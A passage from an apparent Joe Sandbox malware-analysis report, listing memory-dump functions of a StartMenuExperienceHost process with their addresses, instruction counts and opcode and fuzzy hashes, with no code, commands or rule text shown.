                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c08e697d6d3f0f4a3fd672b7ace70df51db92ff098fffef24da5f037cbfb40b4
                                                          • Instruction ID: 2333a3632c13e29ca4a41461a8d5f78f5af289510d0381039ab4f1a408c2b53f
                                                          • Opcode Fuzzy Hash: c08e697d6d3f0f4a3fd672b7ace70df51db92ff098fffef24da5f037cbfb40b4
                                                          • Instruction Fuzzy Hash: C1115730A08A0DCFDB69DB48C454BAD73E1FB68300F5142A9D04ED32B5DA34AA808B45
                                                          Function 00007FFD9B764D1E Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8513e25fc5f28fdd30f2a15e25cc643ecc23e485fa5e5661195462af4d449807
                                                          • Instruction ID: 749d73889029a48fe75c628fd4098ec0ec47e278af0bd8b7283bd2fe52820d55
                                                          • Opcode Fuzzy Hash: 8513e25fc5f28fdd30f2a15e25cc643ecc23e485fa5e5661195462af4d449807
                                                          • Instruction Fuzzy Hash: 19110321B0960DCFEBA8EA68C8A56B833D2EF94300F1611BDD04EC72F6DD386E518605
                                                          Function 00007FFD9B760C38 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abbe8e5f76c3453e861cae0774ed8e81c7ce85a8fa4ef869bb2c64f9a2527d03
                                                          • Instruction ID: 4641cdd95d0891c1fdecdc8c315af84bf679a62eec6cb9f2f3aaf3c4fb113dc9
                                                          • Opcode Fuzzy Hash: abbe8e5f76c3453e861cae0774ed8e81c7ce85a8fa4ef869bb2c64f9a2527d03
                                                          • Instruction Fuzzy Hash: 09118235A0D78D8FE712DBA898A42DD7FB0EF82610F1646F7C085DB1E6E5341A498781
                                                          Function 00007FFD9B797438 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72f291e8f7cf82786745e0dd4b90ade3e4eeea95f36091c2313c516d90a35844
                                                          • Instruction ID: eb0d9a97aaf74b4918bc928718228f06c8658720640caeb51d239b797c8f6e1a
                                                          • Opcode Fuzzy Hash: 72f291e8f7cf82786745e0dd4b90ade3e4eeea95f36091c2313c516d90a35844
                                                          • Instruction Fuzzy Hash: BFF0F42BB4D1910ED709B27C60A28F87F918F5223974881F7E09E8E4E7CD0994898684
                                                          Function 00007FFD9B78CA56 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 8ba51e5395a8b1b36b0f53c9b95a56551daa3b33e106712cb8376e5769b080ea
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: BD019675A1CF888FD7A4DF18844572AB7E2FBA8315F114A2EA09DD3660DB30A8018B42
                                                          Function 00007FFD9B760C40 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0467cd6ee1088144a70b68dc02a3cfc58133e20d8a02460b49e04cf75999c977
                                                          • Instruction ID: 7d9326cd5f793b49ffe4412bfbc4e3721c75e6ca3d090e74029c01311f493075
                                                          • Opcode Fuzzy Hash: 0467cd6ee1088144a70b68dc02a3cfc58133e20d8a02460b49e04cf75999c977
                                                          • Instruction Fuzzy Hash: 3E016135A0D7898FE712DB6484A41DD7FB0EF42210F1646E7C485DB1A6E6345A498741
                                                          Function 00007FFD9B79B5CD Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a203530d34c96f193262595a2236e969ae0ddba7637c88b768344629f18fcf6a
                                                          • Instruction ID: ce330f8747804b4f4fa77d062936c714493bcfc65afad589aa2778e81dd0e567
                                                          • Opcode Fuzzy Hash: a203530d34c96f193262595a2236e969ae0ddba7637c88b768344629f18fcf6a
                                                          • Instruction Fuzzy Hash: 22F0A421B1BA4E4BF668D69804A67B87282BF98750F190235D11DC22F2DD2835418241
                                                          Function 00007FFD9B764CE3 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: c4e5703617728d7ba7fea5ee8646bd425bad09f8d07433ddbcedf704ffda3773
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 78F03630A1951DCEEB68EA54D8A56F873A1FF54311F1501FDD00ED32B6DD386A814A05
                                                          Function 00007FFD9B79AE89 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5340eb465f1be2632332b662faba1890b0f3390e82b8188d8907982e352858d6
                                                          • Instruction ID: 8912e0204cc8023371e2aa6865f43643cb96ccf82467e960d6113502df15b0cb
                                                          • Opcode Fuzzy Hash: 5340eb465f1be2632332b662faba1890b0f3390e82b8188d8907982e352858d6
                                                          • Instruction Fuzzy Hash: 00F0E530B1C7880FC71A9A2958A54617BF1DF5B20534A42FFD49ACB2E3DD18AC458781
                                                          Function 00007FFD9B760C50 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b72fb3ee4c4874d281bf465eb206aa26e7d75ac672da61a2efb48afe050a9171
                                                          • Instruction ID: 05695ddec1e21c0b8048f6d2b8dd29233180283ad5e4f303f82c4e51e85a1511
                                                          • Opcode Fuzzy Hash: b72fb3ee4c4874d281bf465eb206aa26e7d75ac672da61a2efb48afe050a9171
                                                          • Instruction Fuzzy Hash: B3018434A0D389CFE712DBA484941DDBFF0AF02314F1542E7C445DB1A6EA345A44C741
                                                          Function 00007FFD9B7937A9 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47859c6f58e90711ab6b06573cb1aabaa5104090df94f09857e51303ad20489a
                                                          • Instruction ID: 34858df3f288d525c2a62e97ce5cb77128045e5e55fa82da786301a9885a5a9d
                                                          • Opcode Fuzzy Hash: 47859c6f58e90711ab6b06573cb1aabaa5104090df94f09857e51303ad20489a
                                                          • Instruction Fuzzy Hash: 66E09230B09B884FC70E9A29886D5607BA1EF6611278942EFC405CB1A3DA29DC84CB41
                                                          Function 00007FFD9B792529 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a018179314cd67ce9c05a12c8c6d728836e03d92886beaf26a4bf66f383ff318
                                                          • Instruction ID: 762811f1c07b93279ba39493ca447579e58ad3c125cb0ee0e92c01f8db1c4e37
                                                          • Opcode Fuzzy Hash: a018179314cd67ce9c05a12c8c6d728836e03d92886beaf26a4bf66f383ff318
                                                          • Instruction Fuzzy Hash: 68E09230B5A7854FC709AA3888695607BA1EF6710278952FFC446CB1A3DA28DC89C741
                                                          Function 00007FFD9B774B69 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction ID: ffde3ff3103f15b6b858ac260600c74e1821e03faf78a67506566a7edf3cb540
                                                          • Opcode Fuzzy Hash: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction Fuzzy Hash: D5F0A031B0D60E8FFA28AA48D4A06BC7261EB40310F1243B9D41AC31F6DE39AE128690
                                                          Function 00007FFD9B76560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: d5940cba146c16b0edbbff5cba370d03bd6ce0b60e81d7c16d2ee0218abce3f2
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 7DF0B434A0D3068BF3549284C4603A97394DF44310F154279E90E976F2CD286E818705
                                                          Function 00007FFD9B7986B9 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction ID: 206070f4f76dd8aec91febe2a0b093977a54fd6e0732ecad5da23d8e4b0df8d2
                                                          • Opcode Fuzzy Hash: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction Fuzzy Hash: 0EE04F30A1AB844FC70A9B2888699503BB0EF6B21178A40EBD449CB1B3D62DD848C712
                                                          Function 00007FFD9B797E29 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction ID: d5f71805f2d3b956d4049ee78b74e4c4af5d1ee39bf8f3acbeecfbc5eef2f748
                                                          • Opcode Fuzzy Hash: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction Fuzzy Hash: 22E04F21A4A7C00FC30A663488698543BB1DF6721174A01D7D045CB5B3D51DDC4DC711
                                                          Function 00007FFD9B79DE68 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction ID: 3b0d5e8abd0ce2ca53a3bebe35a471ec98e7700fcc6ceb072126859dd7a35095
                                                          • Opcode Fuzzy Hash: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction Fuzzy Hash: 4CE04F34A8D7804FC70A9B3888698503BB1EF5721174A80FFD045CF1B3DA2D9849C752
                                                          Function 00007FFD9B79A9F0 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Function 00007FFD9B79A960 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Function 00007FFD9B77BE4D Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction ID: 70a7c9c01eaabe15e3348d8fe264090bb421f1a0ba5a649b504df77a46688067
                                                          • Opcode Fuzzy Hash: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction Fuzzy Hash: 6AE01A32B0970A8FF725AA94C4E4AA93245EB54310F064675D849D72F2EEA8AA0056C1
                                                          Function 00007FFD9B799439 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef3d8d036fab11cc71859aac51c511f020291b2c17e7915d4cbdb8d17a731c5b
                                                          • Instruction ID: f1fb9befa1aba3dcec86f37a9b6dbabc48013b5b22b7e1ee967b06db0b7b385b
                                                          • Opcode Fuzzy Hash: ef3d8d036fab11cc71859aac51c511f020291b2c17e7915d4cbdb8d17a731c5b
                                                          • Instruction Fuzzy Hash: 27E0123050A7844FC70A9B24C8A99903FB0EF2621178A01EBD409CF5B3DA1D9C49C751
                                                          Function 00007FFD9B79DDE9 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                          • Instruction ID: a063e363b410a398e15121942b096283b7afccf0c641f26452569facfd339e81
                                                          • Opcode Fuzzy Hash: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                          • Instruction Fuzzy Hash: 24E01A3194E7C04FC70B973488698507FA0AE1721078A45EAC085CF1B3E6198849C701
                                                          Function 00007FFD9B760B95 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: 428e5cf728696dce690f4856f8b083968de8d78956b2ef141a538e12728ca06b
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: CDD0A930229A4E8FDA00B77CC88A8247BA0FB0F210FCA10E1E008C75B2E60888A98701
                                                          Function 00007FFD9B7925D0 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                          • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                          Function 00007FFD9B79BC78 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction ID: c4063fc3a21f7f5a6997ec60acdb5ad01519cf133be0afcd3963f33b0daf309b
                                                          • Opcode Fuzzy Hash: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction Fuzzy Hash: A2D01234B559044FC71CA638C89987473A1EB6A216B9541A9D00AC72B1D96ADD89C781
                                                          Function 00007FFD9B797480 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction ID: ffa551e070a69a24c5ce1934b2239f7d7e8f5c3a6bdda62094c9b00d51ab11d4
                                                          • Opcode Fuzzy Hash: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction Fuzzy Hash: BBD01234B519044FC71CA638889A8747391EB6A21679551B9D00ACB2B1DA6ADD89C741
                                                          Function 00007FFD9B79DE78 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f640deda8df11f8bf0bdc2187046cea7d3ea58240c40a11107efbf69b68f1ebc
                                                          • Instruction ID: 1f0d11c4e6c9b18eac84674918e6d4f79f6a7e9df8659f39aad3d9b155a22c34
                                                          • Opcode Fuzzy Hash: f640deda8df11f8bf0bdc2187046cea7d3ea58240c40a11107efbf69b68f1ebc
                                                          • Instruction Fuzzy Hash: F7D0A77594A5844FCB5A9735C8ACC507F50DF6B21435540ECC00A8F2B3D929CD49C700
                                                          Function 00007FFD9B786E10 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction ID: e32e11cf29b9d40dace6209a03f093c1e76c0aae4cd824451ea8229c5322c9e2
                                                          • Opcode Fuzzy Hash: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction Fuzzy Hash: 0BC04C11A5A92F4EE5B872B934521E8B0409B49214B462AF9E41CD51A6DC4D5E9102C6
                                                          Function 00007FFD9B7606AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 7aa13856ce0a2509d84b223f6b7d9800c3bd03e1d9bb254b1f2fc03e76ca40f3
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 66C08C00F1FB0F88E43931EE18A20ADB2004BD4A20FD30333C00E400B99C8E22C50147
                                                          Function 00007FFD9B7612D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 60a0e5e1c8d7b5a6b202f2686d5bc9aadee0aa8c3ef373c70128c864d5324f46
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: 33C08C3051190E8FC908EB28C88480433A0FB19200BC60090E009C7170E219DCC2C741
                                                          Function 00007FFD9B761CF0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
